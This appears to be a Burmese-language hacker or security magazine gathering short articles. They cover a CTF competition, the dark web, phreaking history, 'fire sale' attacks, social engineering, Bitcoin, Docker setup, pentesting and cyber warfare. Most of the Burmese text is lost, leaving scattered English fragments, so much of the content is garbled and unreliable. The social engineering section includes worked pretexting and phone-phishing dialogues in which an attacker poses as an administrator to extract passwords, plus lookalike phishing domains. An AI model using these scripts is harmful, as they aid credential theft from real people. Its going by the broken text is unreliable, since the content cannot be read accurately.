Cross Site Request Fogrey (CSRF) Attack B
။
… ႔ Http Parameter Pollution Attack

။ ႔ ႔ ႔ HPP Attack
။ ႔
။
Written By zer0flag(Myanmar Security Forum)



CTF Experience
Lover
႔ ႔ Asia Cyber Sea Games In Thailand ( Nov 22 )

Exper ။A t Myanmar, Indonesia, Thailand,
Philippines, Malaysia, Singapore, Vietnam, Cambodia, Laos, Brunei ၁ ။
Asia 10 10 ။ Registration time ၈ ။
၊ 10 ။
၊ t t ၊ laptop
t ။ wifi internet ၊ network cable ctf
challenge server access ႔ ။ ႔Team IP address 4 ။
physical machine ip address ။ Virtual Box Bridge Adapter
ip address ။ ip address t t ႔ ။ network monitoring ip
address 4 ႔ ။ network setting ။
challenge 5 ။ category
Reversing 50/300 ၊ Network ( agent44 ) ၊ Memory forensics 100 ၊ crypto ႔
။( ။) reversing
R ။re-50 analysis
။ file download ။ file signature zip flie ႔
extract ။ jrafile ။file extension file
signature data ။ exiftool mp3
audacity raw_import method import F ၐ
။ ၊ speed slowest ၊ t
ၐ ႔ ။
re 300 ႔ ။ challenge password

႔ password flag format submit ။challenge file IDA
analysis user input linux environment ( "Passwd" ) ။
5 hardcore md5 ႔ compare ။ hardcore md5 google
၊ kali rockyou.txt ။ ( flag format prefix
) password ။
။

Memory Forensics Challenge t t ။

pdf file password ႔ ႔ pdfcrack ႔ brute ။
ILoveDifferent.bmp ႔ ။LSB
LSB python ႔ ။ ။png file key md5 IV
႔ ။ Agent44 Network public key & Priv key SSL
Decrypt ။E t M ၐ ႔ http
။flag ။ first round ။12:00
1:00 ။ ႔ ႔ ။
႔ score ။ t ။
။
Second round ႔ 1:00 ။ t - 30

) Second round ။ Re-300 hash
john the ripper ႔crack ။R -100/150/200
IDA ႔ analysis flag ။ john run
႔ john stop ။ challeng easy_pwn ႔
malware timestamp ။
Cryoto challenge ႔ ။challenge logic flag custom encryption

။ encoded text ။ challenge flag ႔ custom
encryption method ႔ ။encryption method
bitwise operator and ('&') python ႔(
။ Network Forensics Challenge ။Challenge logic web
server sql injection attack ။ attacker real ip
။ real ip flag format (Eg. CS2017{11.22.44.55} ) submit
။ Attacker Real Ip L H t IP ႔ ။
@@@‘-- ႔ ႔ submit ။
incorrect ။ 3:00PM C T
။C ။ ႔ ။
M F ႔ score board
၊ hint ႔ C Graph ႔ ။
Team ႔ ။ ၊ ၊
႔ ႔ first score ၂ ႔
flag submit ႔ ။ ႔ Japapn Secon Guest ႔
Air Ticket ။ Facebook
႔ CTF experience ႔ ၊ InfoSec Field

႔ Local Information Security

႔ international Myanmar ႔" "
႔ ။
Noted
* ) first round t t close ။

။
C hint ႔ ။
* ) sore board local Team status

။ Team ။
( japan )
* ) experience ႔ ။
*) ။
Thanks You.
။
( ႔ ။)
Philippines team ႔ ။Philippines t

႔ ။ :P
Lover

RED ROOM
Dr.t3rr0r ( AnonCoders Team )
Dark Web
Dark Web ႔ ႔ Surface Web/ Clearnet ႔ ။

႔ Dark Web Surface Web ႔
။ Surface Web Google ၊ Yahoo ၊ Bings ႔
S E ႔ Web Technology ။ Surface Web
.com, .org, .net ႔ .info ႔ ႔ t ၊E t ႔
t ႔ ႔ ။
Dark Web Deep Web W B

။Dark Web TOR ႔ I2P
Anonymous ႔ ႔
။ ၊
႔ ၊
Cyber Crime ။
TOR ႔ I2P ။ ၐ
Internet Governance ႔ Cyber
။
Deep Web
Deep Web Dark Web ႔ ။

Deep Web Deepnet ၐ ၐ၊Undernet ႔ ၊Invisible Web ( ) Hidden Web ႔
။ Surface Web
Data Communication ၊ W t
႔ ၐ ႔ Trace
႔ ။ Deep Web ႔ ႔
Google Search Engine S t
Dark Web ႔ Web ႔ Total Internet 0.1% ။
Deep Web ႔ ႔ ။

RED ROOM
၊ ၊The Red Room ႔

Dark Web ႔ Deep Web ႔ ။ Dark Web
R R
၊ ။ Red Room ၊
Red Room
Live Stream Videos ။
၊ ႔ Bitcoin ဏ ။
Deep Web
႔ ။ ။ ၊
၊P ၊ ။ ႔ 2014 April Operation Israel
Anonymous ႔ 2014 #OpIsrael
Anonymous Arab ႔ ႔ ။
…။
႔ L St Email ႔ Bt A ။ Bitcoin
ဏ ႔ ႔ ဏ ။
Master ႔ ႔ 0.70 BTC ႔
။ BTC ႔ PGP Encryption Encryption Method Email
Keys ႔ ႔ ။ Surface Web Protonmail
႔ M Dark Web
႔ ။ Corpse Husband Horrifying Deep Web
Stories "W I Q t H ‖ Videos
။Red Room ႔ Cuture ႔ ၁၉၇၆ Snuff ႔
၁၉၈ Cannibal Holocaust ႔ ။
G V t ႔
။
Dark Web H ။
Technical Dark Web
။ Dark Web S t D t
။ Trace ႔ S t
႔ Financial Theft ။ Botnet Repository
။ B M t ႔

ၐ ။ C t C
။ Dark Web ဏ
႔ ၊ ႔ ။Dark Web TOR I2P ႔
network ။
။
The Dark Web ။
D t M t ၊ Dark Web Anonymity

and Security ။ T B ISP
႔ Connection ၐ Law Enforcement ႔ ႔
။ Tor 128-bit AES Encryption Standard ႔ ႔ Internet
Connection Tor Configure VPN
။ VPN ၊ Tor
။
The Dark Web ႔ Firefox ႔ Chromium ႔ ။The Dark Web ႔

Firefox ႔ Chromium ႔ ႔ Tor Browser ။

Dark Web D tM t ။D tM t
AlphaBay ။ AlphaBay Feds ၂ ၁၇ ၊
။ http://pwoah7foa6au2pul.onion/
။ Silk Road 3 ။
႔ Awareness ႔ ။ ။
G ႔ ။Tor T t ။
Tor Browser Windows Size ႔။ JavaScript Browser

။ ႔ .onion Beef run ႔ ။
W ။M - ။Blackmail ႔
။ File Shredding ႔ ။ Recover
႔ ။ FDE ႔ ။Dark Web P t E t
0day Forum ႔ ။
1 Cent PM Casino ႔။
Dr.t3rr0r(AnonCoders)

HISTORY OF HACKING
Hacking ။ Hacking ။
။
" ။ "
Anonymous Facebook ၐ computer
။
Hacking ၒ ၊
႔ ။ ။
Hacking ၁၈၇၈ ။
၁၈၇၆ ။၁၈၇၈
( ) ႔ S t
႔ ။

။ ႔ ႔ Hacking
႔ Michael Devitt ႔ ။
Hacker ။ ၁၉၅ ႔
၁၉၆ ႔ ႔ ။
ဏ ၊ ႔ ၑ Mainframe Computer
။ M C t
။ ႔ ႔
။ Kevin Mitnick ႔
Kevin Poulsen ႔ ၐ Hacker
။
PHREAKERS:
Phreakers ၐ ။ Wikipedia
Phreaking
“P hreaking is a slang term coined to describe the activity of a culture of people who study,
experiment with, or explore telecommunication systems, such as equipment and systems
t t t t ‖
႔ ။ ႔
၊ ႔ ၐ
႔ ။
Phreaking A C ၊ A T ၊ PBX ႔S t
႔ ။ Shoulder
Surfing ။ ။
Facebook R ၐ ။P ။ Burte Force
Attack ႔ ႔ W -D ။
႔ ႔ ။ War-Dial
ၐ ။
၁၉၇၅ Homebrew Computer Club of California

Draper ႔ ၐ blue boxes ႔ ၐ
ၐ ။ Draper ႔
t ။
Steve Wozniak ႔ Steve Jobs ႔ Apple Company
။

႔ ၁၉၈ AT&T Phone Phreaking ႔ T F

ANI ႔ ၐ Automatic Number Identification ႔Att Trace ႔
။ Att T ႔
။ P T
။
Tools Description
Red
ၐ ႔t ။
Box
Black
။
Box
Cheese P P P P
Box ။
Agua
T ။
Box
Blast M
Box ။
Blotto
ၐ ။
Box
Blue
2600-H T ။
Box
Bud
။
Box
Color
။
Box
Copper
Cr T Att D ။
Box
Infinity
R t A t t ။
Box
Mauve
T ။
Box

Diverter ၐ ။
Hackers
၊ Hacking
၁၉၇၁ John Draper
2600-hertz audio tone
ဏ ၐ ဏ
။ Captain Crunch ႔ Temper
႔ ။
၁၉၉၅ Vladimir Levin Citibank

။
႔ Citibank $240,000
႔ ။ Citibank
ဏ ၐ ၃.၇ ၁ ။
။
Hacking ႔
။ Kevin Mitnick C t
S t C t ။
။ C t C ။ Kevin
Mitnick c0mrade ႔ ။ Defense
Threat Redu -ction Agency of U.S. Department of Defense Miami-Dade School
System ႔ BellSouth ႔ Backdoor
U ,P ႔ Email Account ။
။ U.S. Missile Command
။ ။
=========================================================

Fire sale Cyber attack
Fire sale Cyber attack ။ hacker

႔
။
။ Fire sale everything must go ။
၃ ။ ၄ ။
၂ ။
Information Warfare ၂
။ ၂ ဏ
႔ ။ ၍ ႔ ၍
။Cyber Space
႔ ။
၄ ၍ ။ Fire Sale ႔ ၐ
။ Live Free or Die Hard ။
႔ ႔ ။ -
႔ (Disrupting Transpotation)၊
(Stealing and Destroying Financial)၊
(Disabling of Public Utilities) ၍
(Creating Fear with Media) ႔ ။
။
Disrupting Transpotation
႔
။
ၐ ။
။ ႔ ၍
၊ ၊
၊ ၒ ႔
ၐ ၒ ႔ ၐ ။
ၐ ႔ ၊ ၐ ဏ
ၒ ၐ ။ ႔
။

Stealing and Destroying Financial ဏ

၊ ။
ၐ e-Commerce
(ElectoricCommerce )
။ Electoric ၍ ၊
၊ ၊ ၊
/ ႔ ။
၍ ၊ ၊
၊ ႔
။ ၊ ဏ ၊
ဏ ၐ ၐ ။
႔ ၍
၊ ဏ ၊ ဏ
႔ ၊ ၊ ၊
႔ ႔ ။ /
ၐ ။
႔ ႔ ၐ
ၐ ။ L B
V ၁၆.၇၅ ႔
ၐ ။
႔Disabling of Public Utilities

၍ ။
႔ ၊ ၊ ႔ ႔ ႔
။
ၐ ။
႔ ၊ ၐ ။ ႔
႔ ဏ
ၐ
။ St tV
။ ။
Creating Fear with Media ၊

၊ ။
၊
။

- ၊
။ ၊
၍ ၐ
ၐ ။ ၊ ႔ ၊ ၊
၊ ။
႔ ႔ ႔ t
႔ ။
( )
႔
။
UGMH
။ ။
G4 MHU

SOCIAL ENGINEERING
၁။ Network Adminstrator ႔ ႔ D t
Security Software System ။ ႔
႔ Network
-
( ) Firewall System (Hardware/ Software)
( ) Biometric system device
( ) IDS/IPS system
(ဃ) Event logging system
( ) Antivirus system ။
၂။ Security System Monitoring System ၍

႔ Network Condition Data ။
႔ Network L ၊ Hacker Network
S D t t ။
Net-work ။ Network
Social Engineering ႔ ၏
Psychology ၍ Network ၊
။ ၊ ႔ Network Reception phone User
Social Engineering ၍ ၊ ။
၃။ Social Engineering ႔၏ ၊
႔ ၊ ၊ ၊ ႔ ၍
။
၄။ Social Engineering ၏
ၐ ၍ Attacker
။ ။
႔ Net -work data ႔
။

၅။ Social Engineering Attacker Social Engineering

။Social Engineering Attacker
(၆) ။၄ -
( ) Pretexting
( ) Diversion theft
( ) Phishing
(ဃ) IVR (Interactive Voice Response) or Phone Phishing
( ) Baiting
( ) Quid Pro quo
Pretexting
၆။ Pretexting Social Engineering attacker

Network System ႔ Authority ၓ ႔
၍ ။ ႔ Authority ၓ ႔
Attacker ၏ Data
။ ၏ Login Password ID Number ၊ IP Address ႔ ။
၇။ Pretexting ႔ Company
data Server User Name
၊Password Attacker Hacking Technical
၍ ။ ႔ ႔
၏ Username၊ Password Social Security Number၊ Telephone Number၊ Date Of Birth
႔ ။ Attacker
Company ႔ ။၄ ႔
႔ Company ၏ Reception ႔ ႔
။
Attacker: Sharp Company ။
Receiver: ။ Sharp Company ။
Attacker: ၊ ႔ Sharp Company Network Sevice IP Pro

Company ။ ႔ Maintainence Company Database

Server Backup ႔ Username၊ Password Login ႔ ႔

Administrator ။ ႔ ။
Receiver: Server Administrator ။ ၉..... ။

Attacker: IP (၃)
။
Receiver: ။ (၅) ။ ။ ။
Attacker: ႔ Handphone ၐ ႔ ႔
႔ ။
Receiver: ။ ၁-၅၇... ။
Attacker: Administrator ။
Receiver: ။ ။
Attacker: ႔ ။
႔ ႔ ။ ႔
။
Receiver: ၊ ၉.... ။
Attacker: ။
RECEIVER: ။ ၁….. ။
ATTACKER: ၊ Server Duty ။
RECEIVER: ၊ Server Room Phone Number -၂၂၃ ။
။
ATTACKER: Server Room ။
႔ ႔ ႔ ။
RECEIVER: ၁ ။
Administrator ။ ႔ ။
ATTACKER: ၊ ။ ႔ ႔
။
၈။ Attacker Pretexting Social Engineering ၍
company ၏ Database Server Username၊ Password
။၎ ၍ ၃ ၁
။
၉။ Administrator ၃ ၁ ႔
၍ ႔ ၊ ႔ ႔
၍ ။ ႔ ဏ၏ ႔
၊ ဏ ၊ ၊
Password ႔ Pretexting Social

Engineering ။၄ Attacker Username

Password
။
၁ ။ Network Administrator
၍ User Name Password ။ Attacker
၍ ။
Network Administrator ႔
၊ ။ UserName
Password UserName Password
-
ATTACKER: ၊ ။
RECEIVER: ၊S R D t ။
ATTACKER: ။
RECEIVER: ။
ATTACKER: ႔ Sever ႔
။ User Name ႔ Password ။
Sever Restart ။
RECEIVER: ဏ ။ Restart ။ ။
ATTACKER: ဏ ။ .............. ။
RECEIVER: ။
ATTACKER: ။ User Name Password ႔ Sever
။
RECEIVER: ႔ ။
ATTACKER: User Name ႔ Password ဏ ။
႔။ ။
RECEIVER: ။ Username mgkoko
Password ၂၂၃ ။
ATTACKER: ။ See You Tomorrow ။
RECEIVER: Ok Ok ။
၁၁။ Attacker ႔၏ ၊ ႔ ၍ Pretexting

Social Engineering User Name ၊ Password ။
attacker company ( ) sever
administrator login username Password ။
၍ ၍ ။ ၐ
pretexting social engineering

။ ၍
E ။ ႔ ၍ Network Administrator
pretexting social engineering attacking
network Operator ၊ Operator ၊ network duty
။
၁၂။ Pretexting Personal

။ ။ Personal
၍ Att ။ Attacker
၏ ႔ ၍
။ ႔ ၍ ။ ၌
ဏ ၍ Personal
၊ ၊ ဏ ႔
။ ႔ ။
၍ ႔ User Name ။
၏ Password
။ ၏ ၍
P ။ ႔ Pretexting ၍
၎ ၏ ၊ Email ႔ ။ ႔
၍P t t ၍ -
ATTACKER: ၊ ႔ ။
RECEIVER: ၊ ႔ ၊ ႔ ။
ATTACKER: ။
RECEIVER: ၊ ႔ ။
Attacker ၎ ၏
။
Attacker: ႔ ။ ႔ ႔
႔ Mail save ႔ ႔
႔ ။ ႔ ။
၊ ။ Mail Password ( Password)
။ ။
၁၃။ ၏ Password
Attacker ၏ Mail ၊
႔ ။
၁၄။ Pretexting ၍ Personal

။
Online Banking Attacker ၎၏
၍ ၏ Bank ႔ Passwo ၍ Password
၍ ။ Bank Password
Personal ၍
။ Attacker Bank
။ ၎ Bank Password
၏ Bank Account ႔ ။
၁၅။ Pretexting ၊
၍ ။ Pretexting
၆ ။၎ ႔ -
( ) ႔၏ Personal ၊ Emai
႔ ၊ Website ။
( ) Password ႔၏ ၊ ႔၏ ၊ ႔၊
၊ ႔၊ ႔ ။
( ) ႔၏ ဏ ႔ ၊ Pretexting
။
(ဃ) ၍ ၊
M ။
( ) Pretexting ၏
၍၎ ႔ Pretexting
။
( ) ႔၏ ၊ ၊
၏
႔ ။
၁၆။ ႔ ၊ ႔၏ ၎ ႔
၍ Pretexting ႔၏
။ ၎ ႔
၍ ၊
၍ ႔ ။ ႔၏ Password

။၎ Password Account
။Pretexting ႔
ၒ ။ Attacker
၎ ။
Diversion Theft
၁၇။ Diversion Theft Social Engineering Corner Game ႔ Round the

Corner Game ၐ ။၎ ၍
။ Diversion Theft ၏ ။ ၍
ၐ Diversion Theft ႔
။၎ ၐ Attacker
၎ ႔ ဏ၏ Pretexting
၍ ။
ဏ ႔ ၊ ႔
။ ႔ Attacker ႔
၍ Diversion Theft -
Attacker: ႔ ။
Reciver: ။ ႔ ။
Attacker: ႔ ႔ ႔ ။
Reciver: ။
Attacker: ။ ႔ ႔ ဏ ႔
႔ ႔ ။ ႔ ႔
၇၃ x ၇၄ ၊ ၊၅ ႔ ၈ x ၈၁
႔ ။
Reciver: ႔ ႔ ၊ ႔
။ ။
၁၈။ Attacker Pretexting
။
Attacker: ႔ ၊
၁၂/ ( )၁ ၁ ၂၆ ။

Reciver: ဏ ။ ။
႔ ။
Attacker: ။ ႔ ႔။
Reciver: ႔ ၂ ။ ၄ /၁၂၃၄ ။
Attacker: ။
၁၉။ Attacker ႔ ႔
။ ၎ ၍
။ Diversion Theft ႔ ႔
၍ ။ ဏ ႔
၍ Pretexting ႔ ႔
၍ ။ ႔ ၏
၍ ။ ဏ
။ Attacker
၍ ။ ဏ
။ Attacker ။
ဏ ႔
။ ။ ႔
၊ ႔ ၍ ။ Attacker ၎ ႔
၎၏ ။ ႔
၍ ႔ ၍ -
Reciver: ။ ဏ ။
Attacker: ႔ ။
Reciver: ။
Attacker: ႔ ၁၂/ ( )၁ ၁ ၂၆ ။
၂ ။ Attacker ဏ ႔ ၊
၍ ၍ ၍
။၎
။
Reciver: ။ ႔ ။

Attacker: ။ ႔။ ( ႔
၊ ) ႔ ။ ႔ ႔
႔ ။
၂၁။ Attacker ႔ ၊ ၐ ၍
႔ ၊ ႔ ဏ ႔
။ ဏ ႔
Attacker ။
၍ Att
။ ၍ O B S t Attacker
႔ ၏ Personal ဏ
ID Account ႔
။ ၎ Diversion Theft ၊ ၍
။
။
။ ၎
-
Reciver: ။
Attacker: MD ။ ႔
႔ ။ ။
Reciver: ။ ႔ ႔ ။
၂၂။ Attacker ၎ ၏ ၏
။ ႔ Attacker ၍
။ ၍ ႔ ၊ ႔ ၊ ႔
၍ ။
Attacker: ႔ ႔ ။ ။
Mail aaa@adi.com ႔ ။၅ ႔
႔ ။
Reciver: ႔ ။ ။
၂၃။ Attacker ၊ ႔ ၏
Attacker ၏ Mail ႔ ။ ႔

၏ ႔ ။ Diversion Theft Social

Engineering ၍ ။
Diversion Theft ႔ ၍
။ ႔ ႔
၍ ၎ ႔ ။ ႔ ဏ ၊
Diversion Theft
။ ႔ ၍ ႔ ႔ Network ၊ ၊ ဏ
Diversion Theft ၍ ၊
။
Phishing
၂၄။ Phishing Fishing ၍ ၐ

Social Engineering ။Phishing Email
႔ ။၎ Email ၏ ၊
Personal Mail Address ၏ P
၊ Online Bank Account
႔ ။ ႔ Web page ႔
။ Email
၏ Email Password
Link Click ၍ ၏
။ ၎ Link ၏
Web Page ႔ Web Page ။
၎ Web Page ၏
Personal ၊ Password ၊ Bank Account ႔
႔ ။ Attacker P Web
Page ၍ ။ ၏
Bank Account S t U t Bank Account
႔ ဏ ။ ၍ Update
Account
။ ၎ U t Link
http:\\Security.company.com\update\ update.html ႔ ၊
Login.html Att Phishing Web page Link ၍ Mail ႔
P Att ။၎ Phishing Attack
Domain Name ၍ Login Page
Web page ႔ ၍ P ႔
။
၂၅။ ႔ ၎ ႔၏ ၊
Phishing Mail
Phishing Attacking ။
Phisher ၎ ၍ ၎၏ Data
။ ႔ ၊
႔ ၏ Bank Account ႔
Bank
။ ႔ ၊
Mail Link၊ Domain Name
။ ဏ Website security.company
Web page link / ။ ၎ Phishing Domain
Phishing ႔ ။
http:// t P
http://www.mircor-soft.com ၊ http://www.micorsoft.com ႔ ။ ႔
Phis M ။Phishing
-
( )Phishing Email Grammer ၊ Spelling ၊
( )Bank ဏ Personal M
Email ၍ ။
( )Bank ဏ Personal M ၍
Account ၍ ႔
။
၂၆။ Phishing
E Website ၍ ႔
။ Internet User Website ၊ UserName Account
P Website ႔ ၎
Cookies Computer ။ ၎
Cookies Internet ။
၍ Cookies User User
Name Password ၊ U R t User Register ႔
User ႔ ႔ ။ ႔ Phisher
Website ၍
Link Website ႔ C Phishing
။ Link C Cookies Phisher
႔ ။ ႔ Phisher User Name Password ၊ ၏
Personal ႔ ။ ႔ P L
Vulneravilities W ၊PDF ႔
၍D ႔ ၊
O R P ။
၍ ၎ D File Trojan
Phisher ႔ ႔ ။ O R
File Data Phisher ႔ ႔
။ ႔ ႔ Website ၊ Internet
Security System O R ႔ ။
Email Login Page Email Link / File Storage Size ၍ Email Link ၍
P ။ ႔ Email Page Website
၊ Security ၍ ၍ ၊
Website Email ႔ Webpage
။ Phisher
Phishing Webpage ။ Phishing Email
F Mail ၊ Mail
႔ ။
IVR ၐ Phone Phishing
၂၇။ Phone Phishing Email Phishing

။Phishing Email ႔ ၍ Phisher ၏
၍ P P ။
၍ P ။ Phone Phishing
Vishing ၐ ။၎ ႔၏ ၍
႔ ။
၍ mail4u.com.mm Mail Service
-
Attacker: ၁- ၉၂၉ ။
Receiver: ၉၂၉ ။ ။
Attacker: mail4u Service Network Admin ။
Receiver: ။mail4u ။
။
Attacker: ႔ mail4u Service Server Hard Disk System
Error D t
႔
Receive: M ။
Attacker: M ။ M
႔ User Name Password ႔ ။
Receiver: ႔ Company ႔ ။
Attacker: ၊ Customer ႔ P
။ ၍ User P
၏ M
။
Receiver: ၊ ။ Username achitkoko Password
၂၉၁၈၂၇၃ ။ M ႔ ။
၂၈။ ၄ Company ၍
Username Password ။ Attacker
၍ ၍
။
Attacker: ၁- ၉၂၉ ။
Receiver: ၉၂၉ ။ ။
Attacker: mail4u Service Network Admin ။
Receiver: ။ mail4u ။
။
Attacker: Mail Account M
႔ ႔ ။ ၍
႔ ႔
၏ Mail Account ။
Receiver: ။ Mail ။
Attacker: ၊ ႔ Report ။ ၍
Username Password
။ ႔ Account
႔ ႔ ။
႔ ႔ Username Password ႔

႔ ႔ ။ ၍ ၵ
Account ။
Receiver: ၊ Account ။
Account ။ Username Moethout
Password ၂၆၃၇၄၈၃၇ ။
၂၉။ Phone Phishing ၊
၍ ။O B S t ၏
Account
ဏ ၍ ႔၏
ဏ Account ၏ Username ၊ Password Phone Phishint
၍ ။ ႔ Phone Phishing
Company ၏ Network System Company
Company
။
Attacker: Boss Company ။

Receiver: ၊ ။
Attacker: Network Admin ။ Duty
။
Receiver: ။ Duty ။
Attacker: ။
Receiver: ။ ။
Attacker: Network ။
Receiver: ။ ၊ ။
Attacker: ႔ Monitor Report System ႔ Using Status ႔
Network Alert ႔ ။ ႔ User Status
Alert Network Security Attack
႔ ႔ ။
Account Sign out ။
Receiver: ။ ။ ။
Attacker: ၊ Username Account ၐ ။
႔ ႔ U ?P ။ ႔
Duty Network Attack
။
Receiver: ။ ။ ။ Status ။ ။
Attacker: ၊ ။

Receiver: Username Password ။ ႔

။ Username moetain
Password chitpankhat ။
Attacker: ၊ ၊ ။
၃ ။ ၍ Social Engineering
၍ ။
၍ Account ၊
၊
၊ ၐ ၍ ႔ ။
Phone Phishing P ၏ ၐ
၄ ႔ ။ ႔ ႔
၍
။ Phone Phishing
၄ ၏ ႔
။
Baiting
၃၁။ Baiting Phishing ၍ ၐ

။ Phishing Email
Software ။ Baiting Hardware
၍ ။ Trojan Program
၏ ႔ ။ ႔
Malware Floppy Disk ၊ CD USB Flash Drive
႔ ၊ ၊ ၊ ၐ၊
။ ၏
႔ ၊ ၍ ႔
Computer ။ ႔ ၄ Hardware
Trojan Data Username
Password ႔ ႔ ၊ BackDoor
၄
။ ၏ Username၊ P
၊
ၐ ။
၃၂။ Social Engineering

Baiting Hardware
႔ ၊ Company
၊ Antivirus Company Software ၊ Hardware P t
႔
။ Baiting Social Engineering
Computer ႔
Computer Company ႔
၏ Computer ၍
။ B t ၊
။
Quit Pro Quo
၃၃။ Quit Pro Quo

။Social Engineering Attack ၄
၍ ။
႔ ၊ Phone Number ၐ
၍ Company
ၐ ၐ ။ ၍
ၐ ၄ ၐ ၏
ၐ ၏ Computer ။ ႔ ၏ Trojan
Website Link ၊
႔ Command ႔
။ ၂ ၃ ၐ Company
၉ ၄ ၏ Username ၊ Password ၊
၍ ။
၃၄။ Blogging Internet ၍

Social Engineering Website ၍
၏ Computer
။ Social Engineering Attack
ၐ ၍ ႔၏
။
၃၅။ Social Engineering ၊ Email

၊ ။
Chatting ။
Instant Messaging System C tt
Social Engineering ၍ ။C tt
၏ ၊
။
၍ C tt
။ ၍
၏ ။
၊ ၍ ၊ ၍
႔ ။ ႔၏
႔ ၐ ။ ၍ ဏ
။ C tt Social Engineering ၏
႔၏ ။
၊
၊E ၍
၍ ၊ ႔
။
Mail4u Service
Mail Address Social Engineering ၍ Mail Password
။Mail4u Company
။
၏ ၍ Mail Service Company P
Password
၍ ။Mail Service Company ၄ ႔
၍ ။ ႔
Company ႔ ၊
Company Mail Password ။ ႔
၏
႔
။
၃၆။ Social Engineering

။ Network Administrator ၏
Network ၊ ၏ ၏
Social Engineering ၏

။ ၐ ၐ ႔
။
။ ႔၏ ၊
႔
။ Social Engineering
၍ ။ ႔
၊
။ ၏ ၍ Mail ၊ Password ႔ S
၍ ။ ႔ ႔၏
။ Phisher
Spam Mail ႔ ၍
။ ႔၏ ႔၏
။ ၍ Mail 24 Hours
Account
၍ ။
Mail Account S ၍ ။
Network Administrator ႔
၍ ၏ Network ၊ ၄ ၏ Network ႔ ၍ ႔
။ ၓ ၏
ၓ ၍ ၊E ႔
။ Social
Engineering ။
။ ၍ ၄ Social
E ၏ ၄ ၐ
။ ႔ Social Engineering
g4 MHU

BITCOIN ( BTC )
H1N1 And Naing Lin Oo
Bitcoin ၊၂ ၈
S t N t ၊ ႔ ႔ ႔
။ Bitcoin
၊ ၐ
၊ Bt ၂ ၉
1 BTC USD 4 D ၂ ၁၇ 1 BTC
USD 16860 Dollar ၊ Bitcoin
ဏ
႔ ၊
Bitcoin ၂ ၁၆ USD ၂ ၁၇ USD

Wanna Cry Ransomware
၊ Wanna Cry Ransomware ၂ ၁၇
ၐ Microsoft Windows Operation System
Encrypt ၊ ၁၅
႔ ၊ BTC ႔
၊ Bitcoin
ၐ
။B t ႔
႔ ။ Bitcoin
Exchange $64 Million ႔ BTC
႔ ၊ BTC 2018
USD ႔ ႔ ။

DOCKER (၁)
႔ ( IT ) Docker
၊ ။
Docker
Docker open-source ။ t Linux Container( LXC)

Deploy ။ Containerization ႔ ။ L OS ၐ
operating system level virtualized ။ virtualized
t VMware, Virtual Box ႔ Hypervisor
Virtualization Containerization ။ Virtualization ႔
Containerization ။
Image Source: https://jaxenter.com/
။ virtualization Host OS hypervisor

guest OS ။ Guest OS Kernel၊ L
Containerization Host OS K ,L ။
virtualization P Host OS ( server)
။ Performance ၊ ။
RAM 8 GB Host OS virtualization Host 2GB 2GB
guest OS ႔ ။ 8GB
။ C t ႔ H t ၐ

Performance ။ Containerization ႔
Virtualization ။
။
Docker Installation
Docker Linux Container ( LXC ) Microsoft Window

t ၊Window 10 ႔ Window Server 2016 ႔
။ Linux ။
Docker Community Edition ( CE ) ႔ Enterprise Edition ( EE )

။ Docker CE ။D EE
။
https://www.docker.com/pricing
Docker Install ႔ C ။
#zypper in docker ( openSuSE based )
#apt-get install docker-ce ( Ubuntu based)
#dnf install docker-ce ( Fedora based)
openSuSE ႔ ။
#zypper in docker

D t t t ။
#systemctl start docker.service
T tI H run ။
#docker run hello-world
H dock ။
Docker Build -> Ship -> Run ႔ ႔
Developement Build ႔ ။ ႔ run ႔ ။

I ႔ ။Docker O ၊ D
D I ။
။
https://hub.docker.com/explore/
Development Environmet ။ ။
။
D C C t S t
။
PDF link: https://www.docker.com/sites/default/files/Docker_CheatSheet_08.09.2016_0.pdf
Docker ႔ ႔
။
Konova ( openSuSE Myanmar Team)

Developer vs Pentester In Myanmar
Develpoer
႔ ႔ D ႔ ႔ ။
Mobile Phone operating system (IOS,Android,java and etc )
application D ။ ႔
Website Developer ၊software developer ၊game developer ၊ application developer ၊ iOS
developer ၊ android developer ႔ D
။ ႔ ႔ ၊ ႔
။ ႔ programming ဏ
။ ႔ ႔ Security
။ Developer
။
Pentester
Pentester Programming ။ ႔ ႔
programming ႔ ၊ zero day exploit
Website, software, game , application,operating system Pentest ။
Bug ႔ ၐ developer D
။ ႔ ႔ ၊
Developer ႔ company ႔ ။
Developer ႔ company ႔ ။ Developer ႔ Pen-
tester ႔ ။
website t
။ Website ၊ ႔ ၏
ၐ ။
Facebook ႔ Website
Facebook White Hat list ဏ ။
Facebook White hack list ဏ ။ Ebay website
ဏ ။ Ebay ၏ White Hack List
။ pentester
။

P t t ။ Google search
engine website
။ t ။H ၊
၊ ၊
၊ ႔
။
။ t t ၍ Developer ႔
t ။
t t
။
Myanmar Hacker t pentest ။

website ႔ online banking ၂၄ shutdown
႔ ။ ႔ Developer
။
UGMH ႔cyber war online bank
။screenshoot ၎ ႔ UGMH Page
။ website
cyber war t ။ ဏ website
။ website Developer
။
pentester t bug report

႔ ႔ ။ ႔
bug report pentester ႔ ။

website ၊ ၊
website ။
။ H website
၍ " Error " ၐ ။ ႔
ၐ ။ website
server ၏
။
ၐ ။ ႔ app website
။ ႔ t t t
။ pentester website t t ၍
႔ ႔ ။ Developer
pentester ၊ cyber space
…။
Mr.Ph03nix (Black Hat Area)


Cyber Warfare
Mg Alarm @ Myanmar Security Forum
[x] What is Cyber War ->
- ၂၁ ႔ ႔ War ။
႔ Media Media War ။ ႔
Commercial War ။ ႔ ႔ Online
Hack Cyber War ။ ႔
၊ ၊ ၊ ၊ ႔
႔ ႔ ႔ Cyber War ႔ ၊Cyber War
၊ Cyber War ႔ ႔ ႔
E-Govermence / E-Commerce / Communication System O ၐ
။
-Cyber War Government / Military ။

၊ ၊ ႔ ၊
Political Reason ႔ Hacktivists ႔ ။ Cyber
War ။ ။ Cyber War
ၐ ။
- Cyber Warfare N t W t G tP t Down ၊

W t ႔S ။ Website Database
႔C D t / P D t / M t D t
၊ ... ႔ ႔ ။
[x] Examples of CyberWarfare ->
႔ ႔
- ၁၉၉၈ ႔ Air Traffic Control ႔ Air Defense System

႔ T t ႔ ။
-၂ ၇ Estonia ႔ website / website / t

႔ botnet ႔ Ddos ႔O ႔ ။

Estonia ႔ ၂ ႔ ႔ ႔
႔ ႔ ။
-၂ ၇ C ႔ M t A
H 1 T t / G 1000 I t
Download ႔ ။
- ၂ ၉ ၁ Government ႔ P t
O t t GhostNet ႔ ၐ ႔ Cyber Spy Network
႔ ။
GhostNet ႔ Original China ႔ ႔ ႔

႔ ႔ Responsibility ႔ ႔ ။
-၂ ၈ ႔ ႔ ။ ၃
t G tW t t
Deface ။DDoS ။ W t M C
႔ ႔ ။ R t ႔
႔ ႔ ႔ ။
[x] What Do We Know ->
႔ ႔ ..
